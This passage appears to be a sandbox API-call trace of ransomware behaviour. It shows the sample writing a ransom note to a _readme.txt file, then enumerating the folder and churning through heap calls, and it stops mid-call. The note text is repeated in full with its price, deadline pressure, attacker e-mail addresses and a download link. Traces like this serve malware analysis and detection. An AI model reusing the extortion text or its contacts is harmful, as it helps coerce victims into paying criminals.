[0090.822] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.822] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.822] PathFindFileNameW (pszPath="") returned="" [0090.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.822] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.823] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.823] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.823] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.823] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0090.823] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.823] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0090.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.824] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.824] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.824] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.824] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.825] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.825] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.825] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.826] CloseHandle (hObject=0x5cc) returned 1 [0090.826] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.827] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.827] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.827] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.827] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.827] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3326580, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3326580, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3326580, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.827] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.827] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.827] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.828] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.828] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.829] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.829] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.830] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.830] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 